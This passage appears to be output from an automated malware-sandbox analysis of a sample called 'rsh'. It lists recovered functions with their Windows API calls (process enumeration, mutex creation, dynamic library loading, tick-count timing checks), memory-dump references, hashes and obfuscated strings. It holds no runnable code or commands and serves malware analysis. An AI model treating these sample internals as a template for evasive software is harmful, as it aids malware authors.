Part of subcall function 0040131D: DdeAddData.USER32(000650AF,00000002,000003EE,000003EE), ref: 004013C0
Part of subcall function 0040131D: VarI2FromBool.OLEAUT32(0000003F,?), ref: 004013DC
Part of subcall function 0040131D: DosDateTimeToFileTime.KERNEL32(00000018,00000008,?), ref: 004013EF

Memory Dump Source

Source File: 00000012.00000002.1053192427.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.1053174711.00400000.00000002.sdmp
Associated: 00000012.00000002.1053208921.00403000.00000002.sdmp
Associated: 00000012.00000002.1053223030.00404000.00000004.sdmp
Associated: 00000012.00000002.1053234094.00407000.00000008.sdmp
Associated: 00000012.00000002.1053266922.00411000.00000008.sdmp
Associated: 00000012.00000002.1053343116.00427000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_rsh.jbxd

Similarity

API ID: DataTime$BoolCommandCopyDateFileFromLineMedium
String ID:
API String ID: 1182197512-0
Opcode ID: f17e0d1137fd999faf79aec72c49c685136f2ad5c933919e30c3c22c139a29bb
Instruction ID: c575c7213bc7019fb58d4953c6d8d6e3d97244438fd44ec58686195249787015
Opcode Fuzzy Hash: f17e0d1137fd999faf79aec72c49c685136f2ad5c933919e30c3c22c139a29bb
Instruction Fuzzy Hash: E83161B0E113059BCB08EFB9D99546EBBF5AB88300F10453EEC05B7394DA3999008B99

Uniqueness

Uniqueness Score: 100.00%

Function 0021112C, Relevance: 3.0, APIs: 2, Instructions: 30
synchronizationCOMMON

Control-flow Graph

Executed
Not Executed

APIs

_snwprintf.NTDLL ref: 00211145
CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 00211160

Memory Dump Source

Source File: 00000012.00000002.1053018933.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000012.00000002.1053007115.00210000.00000004.sdmp
Associated: 00000012.00000002.1053059304.00221000.00000002.sdmp
Associated: 00000012.00000002.1053070762.00222000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_210000_rsh.jbxd

Similarity

API ID: CreateMutex_snwprintf
String ID:
API String ID: 451050361-0
Opcode ID: e590258967cccc2602cd75abedd9022b43773de3dbe406b7b4c285ab640c629c
Instruction ID: f4a9611e808550f3e120422d53ca85d4e7f40dc300ca6526e8f1a54722f42457
Opcode Fuzzy Hash: e590258967cccc2602cd75abedd9022b43773de3dbe406b7b4c285ab640c629c
Instruction Fuzzy Hash: F9E06876B0011867EB3067D47C46BEE33A8DB44301F0000B1FB09DB141DA718AB14BE2

Uniqueness

Uniqueness Score: 0.01%

Function 00211C27, Relevance: 3.0, APIs: 2, Instructions: 10
COMMON

Control-flow Graph

Executed
Not Executed

APIs

Process32FirstW.KERNEL32 ref: 00211C33
CloseHandle.KERNEL32 ref: 00211C71

Memory Dump Source

Source File: 00000012.00000002.1053018933.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000012.00000002.1053007115.00210000.00000004.sdmp
Associated: 00000012.00000002.1053059304.00221000.00000002.sdmp
Associated: 00000012.00000002.1053070762.00222000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_210000_rsh.jbxd

Similarity

API ID: CloseFirstHandleProcess32
String ID:
API String ID: 917458368-0
Opcode ID: 9db35b78b73654852dd74bb12238022b159324a7ab7bf6f204d092ae80c87c55
Instruction ID: af47102fb4aa0f85f30c8e1eb99d6319b0e09464ed92cc497a6210badceed69d
Opcode Fuzzy Hash: 9db35b78b73654852dd74bb12238022b159324a7ab7bf6f204d092ae80c87c55
Instruction Fuzzy Hash: 02C08C70205111BEE3262FF2FC0C6BF7AACEF03300B204081EA1298040CB344A12CEAA

Uniqueness

Uniqueness Score: 0.01%

Function 00211C58, Relevance: 3.0, APIs: 2, Instructions: 7
COMMON

Control-flow Graph

Executed
Not Executed

APIs

Process32NextW.KERNEL32 ref: 00211C58
CloseHandle.KERNEL32 ref: 00211C71

Memory Dump Source

Source File: 00000012.00000002.1053018933.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000012.00000002.1053007115.00210000.00000004.sdmp
Associated: 00000012.00000002.1053059304.00221000.00000002.sdmp
Associated: 00000012.00000002.1053070762.00222000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_210000_rsh.jbxd

Similarity

API ID: CloseHandleNextProcess32
String ID:
API String ID: 4007157957-0
Opcode ID: b5b920b97cd19edabac0a1484ab4a31651560875cbd9880404a3fa16fadd5bf5
Instruction ID: bc9bb99a1f8fbbc3399ee224240c55e116c43b6d2d4356c196ce595c16899c55
Opcode Fuzzy Hash: b5b920b97cd19edabac0a1484ab4a31651560875cbd9880404a3fa16fadd5bf5
Instruction Fuzzy Hash: 37B09220258001A6622E2BB1B80C2692AA8ED07741310219AE20388850DB30A6229E5B

Uniqueness

Uniqueness Score: 0.01%

Function 004019EA, Relevance: 1.6, APIs: 1, Instructions: 57
COMMON

Control-flow Graph

Executed
Not Executed

APIs

GetBinaryTypeW.KERNEL32 ref: 00401A21

Memory Dump Source

Source File: 00000012.00000002.1053192427.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.1053174711.00400000.00000002.sdmp
Associated: 00000012.00000002.1053208921.00403000.00000002.sdmp
Associated: 00000012.00000002.1053223030.00404000.00000004.sdmp
Associated: 00000012.00000002.1053234094.00407000.00000008.sdmp
Associated: 00000012.00000002.1053266922.00411000.00000008.sdmp
Associated: 00000012.00000002.1053343116.00427000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_rsh.jbxd

Similarity

API ID: BinaryType
String ID:
API String ID: 3726996659-0
Opcode ID: a1be3c93512184e3a6080b38a14f49bcf61ecb428ce6b272bd89712b81bceaed
Instruction ID: 1ba52eb7034f402c5e48614f0375ca34845c483ce201e9733ae1b727170f87a7
Opcode Fuzzy Hash: a1be3c93512184e3a6080b38a14f49bcf61ecb428ce6b272bd89712b81bceaed
Instruction Fuzzy Hash: C821F2B0E012198FCB44DFB4C9917AEBBF0BB48300F10456ED419E77D0E7799A819B85

Uniqueness

Uniqueness Score: 0.18%

Function 0021F290, Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32 ref: 0021F2B0

Memory Dump Source

Source File: 00000012.00000002.1053018933.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000012.00000002.1053007115.00210000.00000004.sdmp
Associated: 00000012.00000002.1053059304.00221000.00000002.sdmp
Associated: 00000012.00000002.1053070762.00222000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_210000_rsh.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 3a89d8681634d02d891e9464d1d42ec086164b2e2d9b2433e683ec51104b3125
Instruction ID: f7d83ee54451dfd7478fea75bfce7d982527e0b8232ba8552fb087d341132f18
Opcode Fuzzy Hash: 3a89d8681634d02d891e9464d1d42ec086164b2e2d9b2433e683ec51104b3125
Instruction Fuzzy Hash: C4C08C2003571062E22037F91D0F3CE30C84F25390F000230BE70840C2EE30A4F1887B

Uniqueness

Uniqueness Score: 0.01%

Function 00401105, Relevance: 1.3, APIs: 1, Instructions: 58
memoryCOMMON

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 004011BA

Memory Dump Source

Source File: 00000012.00000002.1053192427.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.1053174711.00400000.00000002.sdmp
Associated: 00000012.00000002.1053208921.00403000.00000002.sdmp
Associated: 00000012.00000002.1053223030.00404000.00000004.sdmp
Associated: 00000012.00000002.1053234094.00407000.00000008.sdmp
Associated: 00000012.00000002.1053266922.00411000.00000008.sdmp
Associated: 00000012.00000002.1053343116.00427000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_rsh.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: bc03ad2848108be0b88a081dab1cfe64323a2bf15195c138f60f82a15d44c430
Instruction ID: 56eddcb4e82b02089b78e9a68d76c0eddc698a2e06fe2d4a8cf325d7ec8366ef
Opcode Fuzzy Hash: bc03ad2848108be0b88a081dab1cfe64323a2bf15195c138f60f82a15d44c430
Instruction Fuzzy Hash: 1C2134B4D04209DFCB04DFA5D6806AEBBF5EF48304F10842EE958AB390D335AA41CF86

Uniqueness

Uniqueness Score: 0.00%

Non-executed Functions

Function 0040131D, Relevance: 4.6, APIs: 3, Instructions: 71timeUNIQUE

APIs

DdeAddData.USER32(000650AF,00000002,000003EE,000003EE), ref: 004013C0
VarI2FromBool.OLEAUT32(0000003F,?), ref: 004013DC
DosDateTimeToFileTime.KERNEL32(00000018,00000008,?), ref: 004013EF

Memory Dump Source

Source File: 00000012.00000002.1053192427.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.1053174711.00400000.00000002.sdmp
Associated: 00000012.00000002.1053208921.00403000.00000002.sdmp
Associated: 00000012.00000002.1053223030.00404000.00000004.sdmp
Associated: 00000012.00000002.1053234094.00407000.00000008.sdmp
Associated: 00000012.00000002.1053266922.00411000.00000008.sdmp
Associated: 00000012.00000002.1053343116.00427000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_rsh.jbxd

Similarity

API ID: Time$BoolDataDateFileFrom
String ID:
API String ID: 3351727435-0
Opcode ID: 203b2c8d0c995a8781aef7231bffd5b55038142c82f1482647e2fcf25fc06334
Instruction ID: 46c947bf33c4e94d8250dfbb7d78ec3d26d7281bbe9c7593a9ce93f3fa553643
Opcode Fuzzy Hash: 203b2c8d0c995a8781aef7231bffd5b55038142c82f1482647e2fcf25fc06334
Instruction Fuzzy Hash: 34212DB1D50319ABDF08DFE4DC45AEEBBB5BF58700F00402AE505BB284EAB51A44CB54

Uniqueness

Uniqueness Score: 100.00%

Function 001F222C, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 68memoryCOMMON

APIs

GetProcessHeap.KERNEL32 ref: 001F224C

Strings

%X%P, xrefs: 001F2355, 001F2371
dIoqrpDC, xrefs: 001F2270

Memory Dump Source

Source File: 00000012.00000002.1052982410.001F0000.00000040.sdmp, Offset: 001F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1f0000_rsh.jbxd

Similarity

API ID: HeapProcess
String ID: %X%P$dIoqrpDC
API String ID: 54951025-1555403923
Opcode ID: 6d2b16fd6b482de93e2e0d26db66c99ad2bbab943a7e7dd665b94cf93d41a5b3
Instruction ID: 1ee9a0f53abf026eb9fd2b238275eedb4e4235cbd630b8d37ac75ae50993df45
Opcode Fuzzy Hash: 6d2b16fd6b482de93e2e0d26db66c99ad2bbab943a7e7dd665b94cf93d41a5b3
Instruction Fuzzy Hash: BD31D5B4A00218DFCB18DF68D940669BBF1BB88314F2481AED559D7760DB35AA86CF90

Uniqueness

Uniqueness Score: 0.35%

Function 00211A36, Relevance: 3.1, APIs: 2, Instructions: 53libraryloaderCOMMON

APIs

LoadLibraryA.KERNEL32(?), ref: 00211A63
GetProcAddress.KERNEL32(00000000,-00000002), ref: 00211A92

Memory Dump Source

Source File: 00000012.00000002.1053018933.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000012.00000002.1053007115.00210000.00000004.sdmp
Associated: 00000012.00000002.1053059304.00221000.00000002.sdmp
Associated: 00000012.00000002.1053070762.00222000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_210000_rsh.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: afa3c89a13fac53f4533eea2c7ce824e8fcfe59163b42858cdb21772d8c5c492
Instruction ID: 2f1e472a673e20f11d1d8455d22a1e08c323b7a738db9907f46f1449f904c90d
Opcode Fuzzy Hash: afa3c89a13fac53f4533eea2c7ce824e8fcfe59163b42858cdb21772d8c5c492
Instruction Fuzzy Hash: DA1127B5A112069FEB24CF59C984BA67BF9BF60744F284168DE45DB301E730EDA1CA50

Uniqueness

Uniqueness Score: 0.02%

Function 0021277F, Relevance: 3.0, APIs: 2, Instructions: 18COMMON

APIs

RtlGetVersion.NTDLL ref: 0021278A
GetNativeSystemInfo.KERNEL32(?), ref: 00212794

Memory Dump Source

Source File: 00000012.00000002.1053018933.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000012.00000002.1053007115.00210000.00000004.sdmp
Associated: 00000012.00000002.1053059304.00221000.00000002.sdmp
Associated: 00000012.00000002.1053070762.00222000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_210000_rsh.jbxd

Similarity

API ID: InfoNativeSystemVersion
String ID:
API String ID: 2296905803-0
Opcode ID: 83c24d17bd13f1834b6d4f1d674d3ede4de5aeb492768f1e5969fdd6360290f7
Instruction ID: 33efe75dd7077a0c549950bfe31530fa6eb0c83f5b8ac8ab354b3cf312298b84
Opcode Fuzzy Hash: 83c24d17bd13f1834b6d4f1d674d3ede4de5aeb492768f1e5969fdd6360290f7
Instruction Fuzzy Hash: C4E0ED71D0021D8BCB24DB91DC59AECB7B8EB25305F0100E6E509F6161E635DB55CF50

Uniqueness

Uniqueness Score: 0.02%

Function 002156EF, Relevance: .5, Instructions: 487COMMON

Memory Dump Source

Source File: 00000012.00000002.1053018933.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000012.00000002.1053007115.00210000.00000004.sdmp
Associated: 00000012.00000002.1053059304.00221000.00000002.sdmp
Associated: 00000012.00000002.1053070762.00222000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_210000_rsh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20290e1f433d4105225a8208cfd1c5d49bf651cd78e7cb071636bbf24d8e39a7
Instruction ID: e7adc429c9fb899a1c4e5784bec8a471ed75666011aaa52360f2d2500bbb5254
Opcode Fuzzy Hash: 20290e1f433d4105225a8208cfd1c5d49bf651cd78e7cb071636bbf24d8e39a7
Instruction Fuzzy Hash: 69128271E2062ADBCF18CF59C8902FDBBF1FFA4300F24416AC866A7744D6749A91DB90

Uniqueness

Uniqueness Score: 0.00%

Function 00211530, Relevance: .0, Instructions: 19COMMON

Memory Dump Source

Source File: 00000012.00000002.1053018933.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000012.00000002.1053007115.00210000.00000004.sdmp
Associated: 00000012.00000002.1053059304.00221000.00000002.sdmp
Associated: 00000012.00000002.1053070762.00222000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_210000_rsh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21b45d397c98639e40a7841913d41cd61be3381e38113163d8a004f32f593678
Instruction ID: 05434f3b3187d4c5b262cca73dcce724d2d307098e9275d2b7edb8e542691e26
Opcode Fuzzy Hash: 21b45d397c98639e40a7841913d41cd61be3381e38113163d8a004f32f593678
Instruction Fuzzy Hash: A9E0CD32620411D7C7319E4484805A5F3FBEBD076036A0419D65A77A01C274BC608640

Uniqueness

Uniqueness Score: 0.00%

Function 002121B0, Relevance: .0, Instructions: 3COMMON

Memory Dump Source

Source File: 00000012.00000002.1053018933.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000012.00000002.1053007115.00210000.00000004.sdmp
Associated: 00000012.00000002.1053059304.00221000.00000002.sdmp
Associated: 00000012.00000002.1053070762.00222000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_210000_rsh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98b478bd1af69a2275d0ab39f1ac079ffe73a0c4551ec61df12d917ad4ecd62f
Instruction ID: dd1ea78877d89c8c1f21003391c56dd86dd10fe21c56db2a52adb93900471d7c
Opcode Fuzzy Hash: 98b478bd1af69a2275d0ab39f1ac079ffe73a0c4551ec61df12d917ad4ecd62f
Instruction Fuzzy Hash: 8EA00275752980CFCE12CB09C394F9073F4F744B41F0504F1E80997A11C238A900CA00

Uniqueness

Uniqueness Score: 0.00%

Function 0021814A, Relevance: 42.5, APIs: 1, Strings: 23, Instructions: 464libraryUNIQUE

APIs

LoadLibraryW.KERNEL32(00000000), ref: 00219248

Strings

}#y, xrefs: 002190C2
GQ:, xrefs: 00218460
)c=, xrefs: 002188DE
= L-, xrefs: 00218500
;X~, xrefs: 00218A00
id]], xrefs: 002186E0
`[3f, xrefs: 002185F0
2Hl9, xrefs: 002190D6
]7, xrefs: 00218F8C
-v8W, xrefs: 002184BA
+?5, xrefs: 00219195
x, xrefs: 00218B18
vrSw, xrefs: 00218B2C
\Oh, xrefs: 002186F4
p3", xrefs: 00219126
TyFi, xrefs: 00218212
`h, xrefs: 00218550
v9C, xrefs: 00218F64
SD`, xrefs: 00218FAA
FKx|, xrefs: 00218E42
9N, xrefs: 00218726
I5OD, xrefs: 00218B68
', xrefs: 0021833E

Memory Dump Source

Source File: 00000012.00000002.1053018933.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000012.00000002.1053007115.00210000.00000004.sdmp
Associated: 00000012.00000002.1053059304.00221000.00000002.sdmp
Associated: 00000012.00000002.1053070762.00222000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_210000_rsh.jbxd

Similarity

API ID: LibraryLoad
String ID: }#y$ +?5$)c=$-v8W$2Hl9$;X~$= L-$FKx|$GQ:$I5OD$SD`$TyFi$\Oh$`[3f$id]]$p3"$vrSw$v9C$'$9N$`h$]7$x
API String ID: 1029625771-680546991
Opcode ID: d0f37ed454d34f00da2bab4ba826acc83797524bc2bff66c571a028a5a36ad68
Instruction ID: d37057fa2ca63c67d7e2b25718ce1a4985255b379d8cd195a896d115f96318c1
Opcode Fuzzy Hash: d0f37ed454d34f00da2bab4ba826acc83797524bc2bff66c571a028a5a36ad68
Instruction Fuzzy Hash: B982A5F48567A98FDB619F419E857CEBA31BB51304F5082C8C19D3B215CB720B96CF89

Uniqueness

Uniqueness Score: 100.00%

Function 0021A78A, Relevance: 40.7, APIs: 1, Strings: 22, Instructions: 474libraryUNIQUE

APIs

LoadLibraryW.KERNEL32(00000000), ref: 0021B8EC

Strings

\1>, xrefs: 0021A7A8
7, xrefs: 0021B388
7k/, xrefs: 0021B69E
@3", xrefs: 0021B766
B"* , xrefs: 0021B374
.ZI, xrefs: 0021AC4E
^a, xrefs: 0021AE7E
=z4, xrefs: 0021B45A
S1p, xrefs: 0021AA96
:X<, xrefs: 0021B878
WfP=, xrefs: 0021AF3C
7K3, xrefs: 0021B720
H D%, xrefs: 0021B55E
/g=, xrefs: 0021A9BA
/Z7~, xrefs: 0021ACEE
' #C, xrefs: 0021AE38
D=z, xrefs: 0021B5D6
ML-', xrefs: 0021B4B4
RN5`, xrefs: 0021AB90
)jt@, xrefs: 0021B7ED
%h(, xrefs: 0021B068
eJn}, xrefs: 0021B568

Memory Dump Source

Source File: 00000012.00000002.1053018933.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000012.00000002.1053007115.00210000.00000004.sdmp
Associated: 00000012.00000002.1053059304.00221000.00000002.sdmp
Associated: 00000012.00000002.1053070762.00222000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_210000_rsh.jbxd

Similarity

API ID: LibraryLoad
String ID: .ZI$\1>$' #C$)jt@$/Z7~$7$7k/$:X<$=z4$@3"$B"* $D=z$H D%$ML-'$RN5`$S1p$WfP=$eJn}$%h($/g=$7K3$^a
API String ID: 1029625771-3980248509
Opcode ID: aeab3df4cc60778f76ded2e7954f545e6fe1d16230a05405934d5062586330aa
Instruction ID: a8c8bacbec034dd492995889cfb53ac85ee96eef1cea9b6bae16440313b21c49
Opcode Fuzzy Hash: aeab3df4cc60778f76ded2e7954f545e6fe1d16230a05405934d5062586330aa
Instruction Fuzzy Hash: 3482A6F48567698BDB71DF429E8578EBA71BB51304F6086C8C19D3B214CB720B92CF89

Uniqueness

Uniqueness Score: 100.00%

Function 002172DA, Relevance: 30.0, APIs: 1, Strings: 16, Instructions: 266libraryUNIQUE

APIs

LoadLibraryW.KERNEL32(00000000), ref: 00217C1C

Strings

$w 4, xrefs: 00217A64
LP 3, xrefs: 002178DE
'/~, xrefs: 0021744C
/d4, xrefs: 00217B04
F2`?, xrefs: 00217BD1
3@[, xrefs: 00217A32
9I;\, xrefs: 00217820
d;, xrefs: 002177BC
tcZ], xrefs: 0021769A
wk#m, xrefs: 002175D2
e, xrefs: 00217B3E
P&", xrefs: 00217C05
JIx, xrefs: 0021756E
"C#}, xrefs: 002179EC
~o>, xrefs: 0021794C
/@n, xrefs: 00217A28

Memory Dump Source

Source File: 00000012.00000002.1053018933.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000012.00000002.1053007115.00210000.00000004.sdmp
Associated: 00000012.00000002.1053059304.00221000.00000002.sdmp
Associated: 00000012.00000002.1053070762.00222000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_210000_rsh.jbxd

Similarity

API ID: LibraryLoad
String ID: "C#}$$w 4$/@n$/d4$3@[$9I;\$F2`?$JIx$LP 3$P&"$tcZ]$wk#m$~o>$d;$'/~$e
API String ID: 1029625771-3323411440
Opcode ID: a9363f65e1913deb4b020edac3acda33aacc3adbf3d2166581b98d00b0d95ea0
Instruction ID: 7223aa333e4c2ba922a3163113445dd9d420b0e2c703e1847a36ade23e0ae4e2
Opcode Fuzzy Hash: a9363f65e1913deb4b020edac3acda33aacc3adbf3d2166581b98d00b0d95ea0
Instruction Fuzzy Hash: 4212A7B48463698FDB71DF8299897CDBA74BB12744F6086C8C19D3B214CB750B86CF85

Uniqueness

Uniqueness Score: 100.00%

Function 0021C4A2, Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 188libraryUNIQUE

APIs

LoadLibraryW.KERNEL32(00000000), ref: 0021CAD8

Strings

yR O, xrefs: 0021CA25
+, xrefs: 0021C8F8
P0", xrefs: 0021C916
D 0, xrefs: 0021C524
"qZ, xrefs: 0021C8A8
3|G, xrefs: 0021C9B1
5qP, xrefs: 0021C943
Rh<R, xrefs: 0021C5E2
"RD, xrefs: 0021CAA3
y{-, xrefs: 0021C5D8
?z=B, xrefs: 0021CA33
M{%, xrefs: 0021CAAA

Memory Dump Source

Source File: 00000012.00000002.1053018933.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000012.00000002.1053007115.00210000.00000004.sdmp
Associated: 00000012.00000002.1053059304.00221000.00000002.sdmp
Associated: 00000012.00000002.1053070762.00222000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_210000_rsh.jbxd

Similarity

API ID: LibraryLoad
String ID: "RD$"qZ$+$3|G$5qP$?z=B$D 0$M{%$P0"$Rh<R$yR O$y{-
API String ID: 1029625771-2687345366
Opcode ID: 544b0f831fdb6b54472581a0145003926358e1800b9110417c173d3664fed768
Instruction ID: 2ace0424fcc40e5751621c4be8dac8308a4cf001f83b280356ac211c0f918b18
Opcode Fuzzy Hash: 544b0f831fdb6b54472581a0145003926358e1800b9110417c173d3664fed768
Instruction Fuzzy Hash: 84E197B4856369DBDB60DF829A897CDBA70FB16304F6086C8C19D3B314DB750A86CF85

Uniqueness

Uniqueness Score: 100.00%

Function 00219C2A, Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 312libraryUNIQUE

APIs

LoadLibraryW.KERNEL32(00000000), ref: 0021A738

Strings

B, xrefs: 0021A35A
`(", xrefs: 0021A5B2
3:, xrefs: 0021A6D2
*8c=, xrefs: 0021A27E
2Cu, xrefs: 0021A5D5
8q#V, xrefs: 00219ED2
bYT@, xrefs: 00219CAC
"GT+, xrefs: 00219D42
}W@, xrefs: 0021A662
f,Ee, xrefs: 00219CA2
;T{, xrefs: 0021A38C

Memory Dump Source

Source File: 00000012.00000002.1053018933.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000012.00000002.1053007115.00210000.00000004.sdmp
Associated: 00000012.00000002.1053059304.00221000.00000002.sdmp
Associated: 00000012.00000002.1053070762.00222000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_210000_rsh.jbxd

Similarity

API ID: LibraryLoad
String ID: ;T{$"GT+$*8c=$3:$8q#V$B$`("$bYT@$f,Ee$}W@$2Cu
API String ID: 1029625771-535669214
Opcode ID: c7547243a9ba196837203cadd046cde3c39aefb0b45f6d7772398c289503783a
Instruction ID: 348a88fa6043e5fbc8b7aa54ee4587e0c24bc5edd88d31368cd015380e46db28
Opcode Fuzzy Hash: c7547243a9ba196837203cadd046cde3c39aefb0b45f6d7772398c289503783a
Instruction Fuzzy Hash: FE32A6F4C163698BEB61DF4299897CCBB74BB01704F6096C8D16C3A225CB754B86CF89

Uniqueness

Uniqueness Score: 100.00%

Function 0021929A, Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 266libraryUNIQUE

APIs

LoadLibraryW.KERNEL32(00000000), ref: 00219BDC

Strings

[aY<, xrefs: 00219B13
?/&9, xrefs: 00219858
7cn@, xrefs: 00219A56
z9, xrefs: 0021954C
=WB, xrefs: 00219B67
Jg, xrefs: 002196B4
OI5, xrefs: 00219BCA
,M[, xrefs: 002194FC
XX, xrefs: 002199F2
0E_, xrefs: 00219452
h , xrefs: 00219A06

Memory Dump Source

Source File: 00000012.00000002.1053018933.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000012.00000002.1053007115.00210000.00000004.sdmp
Associated: 00000012.00000002.1053059304.00221000.00000002.sdmp
Associated: 00000012.00000002.1053070762.00222000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_210000_rsh.jbxd

Similarity

API ID: LibraryLoad
String ID: ,M[$0E_$7cn@$?/&9$OI5$[aY<$h $=WB$Jg$XX$z9
API String ID: 1029625771-656464786
Opcode ID: 17d854c644c8032166f5983611b9241f5e136eb01f76d2c2b50977a9e0a8cfbe
Instruction ID: 27c46b83659111178bbe21a08cd4b25234e30daf258b5b7e76c0d3421e22e5ce
Opcode Fuzzy Hash: 17d854c644c8032166f5983611b9241f5e136eb01f76d2c2b50977a9e0a8cfbe
Instruction Fuzzy Hash: 4912C5B4C563A98BDB71DF82AA897CCBB74BB01304F6096C8D1593B214CB750B82CF85

Uniqueness

Uniqueness Score: 100.00%

Function 00216E3A, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 140libraryUNIQUE

APIs

LoadLibraryW.KERNEL32(00000000), ref: 00217290

Strings

p/", xrefs: 0021716E
D, xrefs: 00216E6C
yfH, xrefs: 002171E4
?&8, xrefs: 00216EE4
V6'J, xrefs: 00217254

Memory Dump Source

Source File: 00000012.00000002.1053018933.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000012.00000002.1053007115.00210000.00000004.sdmp
Associated: 00000012.00000002.1053059304.00221000.00000002.sdmp
Associated: 00000012.00000002.1053070762.00222000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_210000_rsh.jbxd

Similarity

API ID: LibraryLoad
String ID: ?&8$V6'J$p/"$yfH$D
API String ID: 1029625771-2057726821
Opcode ID: c7d03b5374bc0381c58abc2b937b5a62aa051ea6ed37811e4a272303782a5287
Instruction ID: a664d81179ebb2b91b134308d01e0a13972f96caaa6d7fd51928daa99253b969
Opcode Fuzzy Hash: c7d03b5374bc0381c58abc2b937b5a62aa051ea6ed37811e4a272303782a5287
Instruction Fuzzy Hash: 4EA1B7B4C5936C9FEB608F81AA857CDBA71FB12344F6086C8C5693B614CB750A82CF95

Uniqueness

Uniqueness Score: 100.00%

Function 0021CE91, Relevance: 10.6, APIs: 7, Instructions: 93COMMON

APIs

GetTickCount.KERNEL32 ref: 0021CE9E
SetEvent.KERNEL32 ref: 0021CFF1

Part of subcall function 0021FAE0: lstrcmpiW.KERNEL32(00227950,00227540,?,0021CEE7), ref: 0021FB13

GetTickCount.KERNEL32 ref: 0021CEEB
GetTickCount.KERNEL32 ref: 0021CEFC
GetTickCount.KERNEL32 ref: 0021CF8D
GetTickCount.KERNEL32 ref: 0021CF9E
GetTickCount.KERNEL32 ref: 0021CFC8

Part of subcall function 0021CD40: GetTickCount.KERNEL32 ref: 0021CD4B
Part of subcall function 0021CD40: lstrlen.KERNEL32(00000000), ref: 0021CD75
Part of subcall function 0021CD40: GetTickCount.KERNEL32 ref: 0021CE46

Memory Dump Source

Source File: 00000012.00000002.1053018933.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000012.00000002.1053007115.00210000.00000004.sdmp
Associated: 00000012.00000002.1053059304.00221000.00000002.sdmp
Associated: 00000012.00000002.1053070762.00222000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_210000_rsh.jbxd

Similarity

API ID: CountTick$Eventlstrcmpilstrlen
String ID:
API String ID: 637603502-0
Opcode ID: 8c4ba4b2ea6cbde5f477bcaa4025867715939f21b61f16371310259470fb0b3f
Instruction ID: 19cf301c58592aee25f499eabce12d2a2046ef9ff4dcfd9c96aa87fb5d784cf8
Opcode Fuzzy Hash: 8c4ba4b2ea6cbde5f477bcaa4025867715939f21b61f16371310259470fb0b3f
Instruction Fuzzy Hash: 9131BA7656C30257D720BFB1BC0D78636D59F20348F194426E818C22A2EF74C8B3CEA2

Uniqueness

Uniqueness Score: 0.01%

Function 002110B7, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33UNIQUE

APIs

